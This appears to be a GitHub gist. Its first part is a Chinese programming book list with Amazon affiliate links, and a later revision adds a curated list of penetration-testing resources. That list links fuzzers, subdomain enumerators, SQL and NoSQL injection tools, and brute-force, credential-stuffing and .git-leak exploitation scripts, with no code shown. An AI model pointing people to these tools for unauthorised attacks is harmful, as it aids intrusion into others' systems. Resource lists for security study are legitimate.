权威指南(第6版)](https://www.amazon.cn/gp/product/B007VISQ1Y/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007VISQ1Y&linkCode=as2&tag=vastwork-23)》 * 《[JavaScript 语言精粹(修订版)](https://www.amazon.cn/gp/product/B0097CON2S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0097CON2S&linkCode=as2&tag=vastwork-23)》 * 《[JavaScript DOM编程艺术 (第2版)](https://www.amazon.cn/gp/product/B004VJM5KE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004VJM5KE&linkCode=as2&tag=vastwork-23)》 * 《[JavaScript 高级程序设计(第3版)](https://www.amazon.cn/gp/product/B007OQQVMY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007OQQVMY&linkCode=as2&tag=vastwork-23)》 * 《[JavaScript 异步编程:设计快速响应的网络应用](https://www.amazon.cn/gp/product/B00JVLEYY2/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JVLEYY2&linkCode=as2&tag=vastwork-23)》 * 《[Effective JavaScript:编写高质量JavaScript代码的68个有效方法](https://www.amazon.cn/gp/product/B00GMXI1QY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00GMXI1QY&linkCode=as2&tag=vastwork-23)》 * 《[HTML5 权威指南](https://www.amazon.cn/gp/product/B00H706BIG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00H706BIG&linkCode=as2&tag=vastwork-23)》 * 《[HTML5 秘籍(第2版)](https://www.amazon.cn/gp/product/B015316VJY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B015316VJY&linkCode=as2&tag=vastwork-23)》 * 《[HTML5 与 CSS3 基础教程(第八版)](https://www.amazon.cn/gp/product/B00K58535O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00K58535O&linkCode=as2&tag=vastwork-23)》 * 《[CSS 揭秘](https://www.amazon.cn/gp/product/B01ET3FO86/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ET3FO86&linkCode=as2&tag=vastwork-23)》 * 《[CSS 设计指南(第3版)](https://www.amazon.cn/gp/product/B00M2DKZ1W/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00M2DKZ1W&linkCode=as2&tag=vastwork-23)》 * 《[CSS 权威指南(第3版)](https://www.amazon.cn/gp/product/B0011F5SIC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F5SIC&linkCode=as2&tag=vastwork-23)》 * 《[深入浅出 HTML 与 CSS](https://www.amazon.cn/gp/product/B01LXL42O5/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01LXL42O5&linkCode=as2&tag=vastwork-23)》 ## Java开发 * 《[Java8 实战](https://www.amazon.cn/gp/product/B01ER75QC8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ER75QC8&linkCode=as2&tag=vastwork-23)》 * 《[Java并发编程实战](https://www.amazon.cn/gp/product/B0077K9XHW/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0077K9XHW&linkCode=as2&tag=vastwork-23)》 * 《[Java性能权威指南](https://www.amazon.cn/gp/product/B01DLB7Z66/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01DLB7Z66&linkCode=as2&tag=vastwork-23)》 * 《[Java程序员修炼之道](https://www.amazon.cn/gp/product/B00E0D2OX4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00E0D2OX4&linkCode=as2&tag=vastwork-23)》 * 《[实战Java高并发程序设计](https://www.amazon.cn/gp/product/B017MEN094/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B017MEN094&linkCode=as2&tag=vastwork-23)》 * 《[Java编程思想 (第4版)](https://www.amazon.cn/gp/product/B0011F7WU4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F7WU4&linkCode=as2&tag=vastwork-23)》 * 《[深入理解Java虚拟机(第2版)](https://www.amazon.cn/gp/product/B01HI0BUF8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01HI0BUF8&linkCode=as2&tag=vastwork-23)》 * 《[Effective java 中文版(第2版)](https://www.amazon.cn/gp/product/B001PTGR52/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001PTGR52&linkCode=as2&tag=vastwork-23)》 * 《[Java核心技术·卷1:基础知识(原书第9版)](https://www.amazon.cn/gp/product/B01M22BGUQ/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01M22BGUQ&linkCode=as2&tag=vastwork-23)》 * 《[Java核心技术·卷2:高级特性(原书第9版)](https://www.amazon.cn/gp/product/B00IK7SM6O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IK7SM6O&linkCode=as2&tag=vastwork-23)》 ## .NET * 《[精通C#(第6版)](https://www.amazon.cn/gp/product/B00DVDDP0K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00DVDDP0K&linkCode=as2&tag=vastwork-23)》 * 《[深入理解C#(第3版)](https://www.amazon.cn/gp/product/B00J94AG2A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00J94AG2A&linkCode=as2&tag=vastwork-23)》 * 《[CLR via C#(第4版)](https://www.amazon.cn/gp/product/B00P8VZ8T4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00P8VZ8T4&linkCode=as2&tag=vastwork-23)》 ## Python * 《[集体智慧编程](https://www.amazon.cn/gp/product/B00UI93JD8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00UI93JD8&linkCode=as2&tag=vastwork-23)》 * 《[笨办法学Python](https://www.amazon.cn/gp/product/B00P6OJ0TC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00P6OJ0TC&linkCode=as2&tag=vastwork-23)》 * 《[Python基础教程](https://www.amazon.cn/gp/product/B00KAFX65Q/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KAFX65Q&linkCode=as2&tag=vastwork-23)》 * 《Python源码剖析》 * 《[Head First Python](https://www.amazon.cn/gp/product/B007NB2B4M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007NB2B4M&linkCode=as2&tag=vastwork-23)》 * 《[与孩子一起学编程](https://www.amazon.cn/gp/product/B00HECW20S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00HECW20S&linkCode=as2&tag=vastwork-23)》 * 《[Python学习手册(第4版)](https://www.amazon.cn/gp/product/B004TUJ7A6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004TUJ7A6&linkCode=as2&tag=vastwork-23)》 * 《[Python Cookbook(第3版)](https://www.amazon.cn/gp/product/B00WKR1OKG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00WKR1OKG&linkCode=as2&tag=vastwork-23)》 * 《[Python参考手册(第4版)](https://www.amazon.cn/gp/product/B01MCUN37Y/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01MCUN37Y&linkCode=as2&tag=vastwork-23)》 * 《[Python核心编程(第3版)](https://www.amazon.cn/gp/product/B01FQAS0KK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01FQAS0KK&linkCode=as2&tag=vastwork-23)》 * 《[Python科学计算(第2版)](https://www.amazon.cn/gp/product/B01HCVUJFA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01HCVUJFA&linkCode=as2&tag=vastwork-23)》 * 《[利用 Python 进行数据分析](https://www.amazon.cn/gp/product/B00GHGZLWS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00GHGZLWS&linkCode=as2&tag=vastwork-23)》 * 《[Think Python:像计算机科学家一样思考Python(第2版)](https://www.amazon.cn/gp/product/B01ION3W54/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ION3W54&linkCode=as2&tag=vastwork-23)》 * 《[Python编程实战:运用设计模式、并发和程序库创建高质量程序](https://www.amazon.cn/gp/product/B00MHDPIJ6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00MHDPIJ6&linkCode=as2&tag=vastwork-23)》 * 《[Python绝技:运用Python成为顶级黑客](https://www.amazon.cn/gp/product/B019ZRGBVU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B019ZRGBVU&linkCode=as2&tag=vastwork-23)》 * 《[Flask Web开发:基于Python的Web应用开发实战](https://www.amazon.cn/gp/product/B0153177A6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0153177A6&linkCode=as2&tag=vastwork-23)》 ## Android * 《[Android编程权威指南(第2版)](https://www.amazon.cn/gp/product/B01FSXCBOQ/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01FSXCBOQ&linkCode=as2&tag=vastwork-23)》 * 《[移动应用UI设计模式(第2版)](https://www.amazon.cn/gp/product/B00SFZGX08/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00SFZGX08&linkCode=as2&tag=vastwork-23)》 ## iOS * 《[iOS编程实战](https://www.amazon.cn/gp/product/B00NKZCM3U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00NKZCM3U&linkCode=as2&tag=vastwork-23)》 * 《[iOS编程(第4版)](https://www.amazon.cn/gp/product/B013UG2ULW/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B013UG2ULW&linkCode=as2&tag=vastwork-23)》 * 《[Objective-C高级编程](https://www.amazon.cn/gp/product/B00DE60G3S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00DE60G3S&linkCode=as2&tag=vastwork-23)》 * 《[Effective Objective-C 2.0:编写高质量iOS与OS X代码的52个有效方法](https://www.amazon.cn/gp/product/B00IDSGY06/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IDSGY06&linkCode=as2&tag=vastwork-23)》 ## PHP * 《[Head First PHP & MySQL(中文版)](https://www.amazon.cn/gp/product/B004R1QIJU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004R1QIJU&linkCode=as2&tag=vastwork-23)》 * 《[深入PHP:面向对象、模式与实践(第3版)](https://www.amazon.cn/gp/product/B005D6IRRY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005D6IRRY&linkCode=as2&tag=vastwork-23)》 ## C语言 * 《[C标准库](https://www.amazon.cn/gp/product/B00IZW4DK8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IZW4DK8&linkCode=as2&tag=vastwork-23)》 * 《[C和指针](https://www.amazon.cn/gp/product/B00163LU68/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00163LU68&linkCode=as2&tag=vastwork-23)》 * 《[C专家编程](https://www.amazon.cn/gp/product/B0012NIW9K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0012NIW9K&linkCode=as2&tag=vastwork-23)》 * 《[C陷阱与缺陷](https://www.amazon.cn/gp/product/B0012UMPBY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0012UMPBY&linkCode=as2&tag=vastwork-23)》 * 《[C语言接口与实现](https://www.amazon.cn/gp/product/B01D10NSCM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01D10NSCM&linkCode=as2&tag=vastwork-23)》 * 《[C程序设计语言(第2版)](https://www.amazon.cn/gp/product/B0011425T8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011425T8&linkCode=as2&tag=vastwork-23)》 * 《C语言参考手册(第5版)》 ## C++ * 《[C++标准库](https://www.amazon.cn/gp/product/B00YLZIRHI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00YLZIRHI&linkCode=as2&tag=vastwork-23)》 * 《[C++编程思想](https://www.amazon.cn/gp/product/B005CFUQR0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005CFUQR0&linkCode=as2&tag=vastwork-23)》 * <span style="font-weight: normal;">《</span>C++语言的设计与演化<span style="font-weight: normal;">》</span> * 《[C++程序设计原理与实践](https://www.amazon.cn/gp/product/B003VPX6YS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003VPX6YS&linkCode=as2&tag=vastwork-23)》 * 《[C++ Primer (中文第5版)](https://www.amazon.cn/gp/product/B00ESUIL0O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ESUIL0O&linkCode=as2&tag=vastwork-23)》 * 《[C++ Primer习题集(第5版)](https://www.amazon.cn/gp/product/B00S6U4C6E/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00S6U4C6E&linkCode=as2&tag=vastwork-23) 》 * 《[C++程序设计语言(第1-3部分)(原书第4版)](https://www.amazon.cn/gp/product/B01I9BNASA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01I9BNASA&linkCode=as2&tag=vastwork-23) 》 * 《[Effective C++:改善程序与设计的55个具体做法(第3版)(中文版) ](https://www.amazon.cn/gp/product/B004G72P24/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004G72P24&linkCode=as2&tag=vastwork-23)》 * 《[More Effective C++:35个改善编程与设计的有效方法(中文版) ](https://www.amazon.cn/gp/product/B004IP8BD6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004IP8BD6&linkCode=as2&tag=vastwork-23)》 ## 机器学习和数据挖掘 * 《[数据之巅](https://www.amazon.cn/gp/product/B00JUE9DXW/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JUE9DXW&linkCode=as2&tag=vastwork-23)》 * 《[矩阵分析](https://www.amazon.cn/gp/product/B00NTM5GK0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00NTM5GK0&linkCode=as2&tag=vastwork-23)》 * 《[机器学习](https://www.amazon.cn/gp/product/B002WC7NH2/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B002WC7NH2&linkCode=as2&tag=vastwork-23)》 * 《[统计学习方法](https://www.amazon.cn/gp/product/B007TSFMTA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007TSFMTA&linkCode=as2&tag=vastwork-23)》 * 《[机器学习导论](https://www.amazon.cn/gp/product/B01AG3ZV9K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01AG3ZV9K&linkCode=as2&tag=vastwork-23)》 * 《[推荐系统实践](https://www.amazon.cn/gp/product/B008AK5YJO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008AK5YJO&linkCode=as2&tag=vastwork-23)》 * 《[机器学习实战](https://www.amazon.cn/gp/product/B00D747PTK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00D747PTK&linkCode=as2&tag=vastwork-23)》 * 《[Web数据挖掘](https://www.amazon.cn/gp/product/B00AY830HS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00AY830HS&linkCode=as2&tag=vastwork-23)》 * 《[深入浅出统计学](https://www.amazon.cn/gp/product/B006PHIVNA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B006PHIVNA&linkCode=as2&tag=vastwork-23)》 * 《[模式分类(第2版)](https://www.amazon.cn/gp/product/B00116C3DY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00116C3DY&linkCode=as2&tag=vastwork-23)》 * 《[概率论与数理统计](https://www.amazon.cn/gp/product/B00264GG56/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00264GG56&linkCode=as2&tag=vastwork-23)》 * 《[统计学习基础(第2版)(英文)](https://www.amazon.cn/gp/product/B00PRH2BXA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PRH2BXA&linkCode=as2&tag=vastwork-23) 》 * 《[数据挖掘:概念与技术(第3版)](https://www.amazon.cn/gp/product/B007NR0T4A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007NR0T4A&linkCode=as2&tag=vastwork-23)》 * 《[数据挖掘:实用机器学习工具与技术(原书第3版)](https://www.amazon.cn/gp/product/B00K5I91WK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00K5I91WK&linkCode=as2&tag=vastwork-23)》 * 《[大数据:互联网大规模数据挖掘与分布式处理(第2版)](https://www.amazon.cn/gp/product/B011I34CGA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B011I34CGA&linkCode=as2&tag=vastwork-23)》 ## 数据库 * 《[SQL应用重构](https://www.amazon.cn/gp/product/B00H6X6M1A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00H6X6M1A&linkCode=as2&tag=vastwork-23)》 * 《[SQL Cookbook](https://www.amazon.cn/gp/product/0596009763/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=0596009763&linkCode=as2&tag=vastwork-23)》 * 《[高性能MySQL (第3版)](https://www.amazon.cn/gp/product/B00C1W58DE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00C1W58DE&linkCode=as2&tag=vastwork-23)》 * 《深入浅出SQL(中文版)》 * 《[MySQL技术内幕 : InnoDB存储引擎(第2版)](https://www.amazon.cn/gp/product/B00ETOV48K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ETOV48K&linkCode=as2&tag=vastwork-23)》 * 《[深入浅出MySQL : 数据库开发、优化与管理维护](https://www.amazon.cn/gp/product/B00KR87J8G/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KR87J8G&linkCode=as2&tag=vastwork-23)》 ## 测试 * 《[探索式软件测试](https://www.amazon.cn/gp/product/B003JBIV0S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003JBIV0S&linkCode=as2&tag=vastwork-23)》 * 《[有效的单元测试](https://www.amazon.cn/gp/product/B00PVOND2W/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PVOND2W&linkCode=as2&tag=vastwork-23)》 * 《[Google软件测试之道](https://www.amazon.cn/gp/product/B00FH36R6G/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00FH36R6G&linkCode=as2&tag=vastwork-23)》 ## 项目与团队 * 《[人月神话](https://www.amazon.cn/gp/product/B00VR8ZO28/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00VR8ZO28&linkCode=as2&tag=vastwork-23)》 * 《[快速软件开发](https://www.amazon.cn/gp/product/B001DBRWL0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001DBRWL0&linkCode=as2&tag=vastwork-23)》 * 《[人件(原书第3版)](https://www.amazon.cn/gp/product/B00MO7R1SG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00MO7R1SG&linkCode=as2&tag=vastwork-23)》 * 《[门后的秘密:卓越管理的故事](https://www.amazon.cn/gp/product/B00CBBKRQ8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CBBKRQ8&linkCode=as2&tag=vastwork-23)》 * 《[极客与团队:软件工程师的团队生存秘笈](https://www.amazon.cn/gp/product/B00BLZMG8W/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00BLZMG8W&linkCode=as2&tag=vastwork-23)》 ## 求职面试 * 《[程序员面试金典(第5版)](https://www.amazon.cn/gp/product/B00G8VOQOG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00G8VOQOG&linkCode=as2&tag=vastwork-23)》 * 《[编程之美 : 微软技术面试心得](https://www.amazon.cn/gp/product/B00W5269HO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00W5269HO&linkCode=as2&tag=vastwork-23)》 * 《[金领简历:敲开苹果、微软、谷歌的大门](https://www.amazon.cn/gp/product/B00ALPRM7S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ALPRM7S&linkCode=as2&tag=vastwork-23)》 * 《[剑指Offer:名企面试官精讲典型编程题(纪念版)](https://www.amazon.cn/gp/product/B00L5LKMVU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00L5LKMVU&linkCode=as2&tag=vastwork-23)》 ## 编程之外 * 《[暗时间](https://www.amazon.cn/gp/product/B005DSK4W8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005DSK4W8&linkCode=as2&tag=vastwork-23)》 * 《[数学之美](https://www.amazon.cn/gp/product/B00P6OJ09C/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00P6OJ09C&linkCode=as2&tag=vastwork-23)》 * 《[赢得朋友](https://www.amazon.cn/gp/product/B00ANY9KZE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ANY9KZE&linkCode=as2&tag=vastwork-23)》 * 《[精益创业](https://www.amazon.cn/gp/product/B008MIFWJG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008MIFWJG&linkCode=as2&tag=vastwork-23)》 * 《[批判性思维](https://www.amazon.cn/gp/product/B00QPZARMA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00QPZARMA&linkCode=as2&tag=vastwork-23)》 * 《[世界是数字的](https://www.amazon.cn/gp/product/B00M2DKZNA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00M2DKZNA&linkCode=as2&tag=vastwork-23)》 * 《[程序员的数学](https://www.amazon.cn/gp/product/B00A4H3JJS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00A4H3JJS&linkCode=as2&tag=vastwork-23)》 * 《[程序员健康指南](https://www.amazon.cn/gp/product/B00N4LZ6RO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00N4LZ6RO&linkCode=as2&tag=vastwork-23)》 * 《[禅与摩托车维修艺术](https://www.amazon.cn/gp/product/B005O4PUFC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005O4PUFC&linkCode=as2&tag=vastwork-23)》 * 《[关键对话:如何高效能沟通](https://www.amazon.cn/gp/product/B0081M8TZ2/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0081M8TZ2&linkCode=as2&tag=vastwork-23)》 * 《[写作法宝:非虚构写作指南](https://www.amazon.cn/gp/product/B00EY8JUBO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00EY8JUBO&linkCode=as2&tag=vastwork-23)》 * 《[黑客与画家 : 来自计算机时代的高见](https://www.amazon.cn/gp/product/B00G1ZT2C0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00G1ZT2C0&linkCode=as2&tag=vastwork-23)》 * 《[软件随想录(卷1)](https://www.amazon.cn/gp/product/B00WDTQU8M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00WDTQU8M&linkCode=as2&tag=vastwork-23)》《[软件随想录(卷2)](https://www.amazon.cn/gp/product/B00WFT32FY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00WFT32FY&linkCode=as2&tag=vastwork-23)》 * 《[如何把事情做到最好:改变全球9800万人的人生指导书](https://www.amazon.cn/gp/product/B00ICWNKT6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ICWNKT6&linkCode=as2&tag=vastwork-23)》 -
Chuanjian Wang revised this gist
May 23, 2017 . 1 changed file with 189 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,189 @@ 入门指南 https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版 https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版 https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版 https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版 https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门 https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南 http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 渗透测试Node.js应用 https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表 https://sec-wiki.com/ sec-wiki安全维基百科 fuzz工具收集 https://github.com/ivanfratric/winafl https://github.com/attekett/NodeFuzz https://github.com/google/oss-fuzz http://blog.topsec.com.cn/ad_lab/alphafuzzer/ http://llvm.org/docs/LibFuzzer.html 子域名枚举 https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本) https://github.com/ring04h/wydomain (子域名字典穷举) https://github.com/le4f/dnsmaper (子域名枚举与地图标记) https://github.com/0xbug/orangescan (在线子域名信息收集工具) https://github.com/TheRook/subbrute (根据DNS记录查询子域名) https://github.com/We5ter/GSDF (基于谷歌SSL透明证书的子域名查询脚本) https://github.com/mandatoryprogrammer/cloudflare_enum (使用CloudFlare进行子域名枚举的脚本) https://github.com/18F/domain-scan (A domain scanner) https://github.com/guelfoweb/knock (Knock Subdomain Scan) https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (多方式收集目标子域名信息) https://github.com/code-scan/BroDomain (兄弟域名查询) https://github.com/chuhades/dnsbrute (基于dns查询的子域名枚举) web应用扫描器 http://github.com/Arachni/arachni (web应用安全扫描器框架 http://www.arachni-scanner.com) 数据库扫描、注入工具 https://github.com/sqlmapproject/sqlmap (注入工具之王sqlmap) https://github.com/0xbug/SQLiScanner (一款基于SQLMAP和Charles的被动SQL注入漏洞扫描工具) https://github.com/stamparm/DSSS (99行代码实现的sql注入漏洞扫描器) https://github.com/youngyangyang04/NoSQLAttack (一款针对mongoDB的攻击工具) https://github.com/Neohapsis/bbqsql (SQL盲注利用框架) https://github.com/NetSPI/PowerUpSQL (攻击SQLSERVER的Powershell脚本框架) https://github.com/WhitewidowScanner/whitewidow (又一款数据库扫描器) https://github.com/stampery/mongoaudit (MongoDB审计及渗透工具) https://github.com/commixproject/commix (注入点命令执行利用工具) 弱口令或信息泄漏扫描 https://github.com/lijiejie/htpwdScan (一个简单的HTTP暴力破解、撞库攻击脚本) https://github.com/lijiejie/BBScan (一个迷你的信息泄漏批量扫描脚本) https://github.com/lijiejie/GitHack (.git文件夹泄漏利用工具) https://github.com/LoRexxar/BScanner (基于字典的目录扫描小工具) https://github.com/she11c0der/fenghuangscanner_v3 (各种端口及弱口令检测,作者wilson9x1,原地址失效) 